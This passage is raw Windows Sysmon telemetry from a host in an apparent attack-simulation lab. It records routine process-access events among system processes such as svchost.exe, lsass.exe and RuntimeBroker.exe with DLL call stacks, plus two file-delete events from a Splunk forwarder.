12:02:35.200{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-64DB-6064-B800-00000000AE01}6436C:\Windows\System32\mobsync.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+163fd|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+db992|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007439Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:35.200{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-64DB-6064-B800-00000000AE01}6436C:\Windows\System32\mobsync.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+19ab3|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007438Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:35.169{266CAFBE-646A-6064-0B00-00000000AE01}8564500C:\Windows\system32\lsass.exe{266CAFBE-646E-6064-2000-00000000AE01}2456C:\Windows\system32\compattelrunner.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007437Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:35.169{266CAFBE-646A-6064-0B00-00000000AE01}8564500C:\Windows\system32\lsass.exe{266CAFBE-646E-6064-2000-00000000AE01}2456C:\Windows\system32\compattelrunner.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007436Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:35.138{266CAFBE-646C-6064-1000-00000000AE01}11242344C:\Windows\system32\svchost.exe{266CAFBE-64DB-6064-B800-00000000AE01}6436C:\Windows\System32\mobsync.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007435Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:35.138{266CAFBE-646C-6064-1000-00000000AE01}11241624C:\Windows\system32\svchost.exe{266CAFBE-64DB-6064-B800-00000000AE01}6436C:\Windows\System32\mobsync.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007434Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:35.138{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64DB-6064-B800-00000000AE01}6436C:\Windows\System32\mobsync.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007433Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:35.044{266CAFBE-64C1-6064-9100-00000000AE01}51083828C:\Windows\system32\csrss.exe{266CAFBE-64DB-6064-B800-00000000AE01}6436C:\Windows\System32\mobsync.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000007432Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:34.998{266CAFBE-6469-6064-0500-00000000AE01}624640C:\Windows\system32\csrss.exe{266CAFBE-64DB-6064-B800-00000000AE01}6436C:\Windows\System32\mobsync.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000007431Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:34.998{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64DB-6064-B800-00000000AE01}6436C:\Windows\System32\mobsync.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35af2|c:\windows\system32\rpcss.dll+3c90d|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007746Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.571{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ad|C:\Windows\SYSTEM32\psmserviceexthost.dll+11025|C:\Windows\SYSTEM32\psmserviceexthost.dll+1089f|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007745Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.571{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ad|C:\Windows\SYSTEM32\psmserviceexthost.dll+11025|C:\Windows\SYSTEM32\psmserviceexthost.dll+1089f|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007744Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.571{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12eec|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000007743Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.571{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12eec|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 23542300x80000000000000007742Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.431{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3479826513C511EA7BEC6E3BCF7C5BB9,SHA256=8C77626711D0248FEF3D165B15B02692A2CC2321414AC71242C08769AFB7C101,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000007741Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.275{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=01CF40EFD4A523D38337FFF17BCE0547,SHA256=D0F45D5891AAD40E74E27D86A78552F1A40A7EDE1BD402FEF0614AF0A3938E91,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000007740Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.213{266CAFBE-64C4-6064-9B00-00000000AE01}49246152C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007739Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.213{266CAFBE-64C4-6064-9B00-00000000AE01}49246152C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x80000000000000007738Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.213{266CAFBE-64C4-6064-9B00-00000000AE01}49245284C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+12bc4b|C:\Windows\System32\Windows.Storage.dll+12db23|C:\Windows\System32\Windows.Storage.dll+12bb5c|C:\Windows\System32\Windows.Storage.dll+12f2d1|C:\Windows\System32\Windows.Storage.dll+12e5ac|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\Windows.Storage.dll+e906c 10341000x80000000000000007737Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.213{266CAFBE-64C4-6064-9B00-00000000AE01}49245284C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+12bbe8|C:\Windows\System32\Windows.Storage.dll+12db04|C:\Windows\System32\Windows.Storage.dll+12bb5c|C:\Windows\System32\Windows.Storage.dll+12f2d1|C:\Windows\System32\Windows.Storage.dll+12e5ac|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\Windows.Storage.dll+e906c 10341000x80000000000000007736Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.213{266CAFBE-64C4-6064-9B00-00000000AE01}49245284C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+12cd6b|C:\Windows\System32\Windows.Storage.dll+12c245|C:\Windows\System32\Windows.Storage.dll+12c022|C:\Windows\System32\Windows.Storage.dll+12f28a|C:\Windows\System32\Windows.Storage.dll+12e5ac|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\Windows.Storage.dll+e906c 10341000x80000000000000007735Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.213{266CAFBE-64C4-6064-9B00-00000000AE01}49246152C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5ce7c|C:\Windows\System32\Windows.Storage.dll+e5b69|C:\Windows\System32\Windows.Storage.dll+e5cf4|C:\Windows\System32\Windows.Storage.dll+615c6|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x80000000000000007734Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.213{266CAFBE-64C4-6064-9B00-00000000AE01}49245284C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+60e40|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\Windows.Storage.dll+e906c|C:\Windows\System32\Windows.Storage.dll+e8a72|C:\Windows\System32\Windows.Storage.dll+e6459|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007733Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.197{266CAFBE-64C4-6064-9B00-00000000AE01}49245284C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5ceeb|C:\Windows\System32\Windows.Storage.dll+5fb52|C:\Windows\System32\Windows.Storage.dll+60148|C:\Windows\System32\Windows.Storage.dll+19f723|C:\Windows\System32\Windows.Storage.dll+60e25|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\Windows.Storage.dll+e906c 10341000x80000000000000007732Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.197{266CAFBE-64C4-6064-9B00-00000000AE01}49245284C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+60513|C:\Windows\System32\Windows.Storage.dll+19f828|C:\Windows\System32\Windows.Storage.dll+19f709|C:\Windows\System32\Windows.Storage.dll+60e25|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dl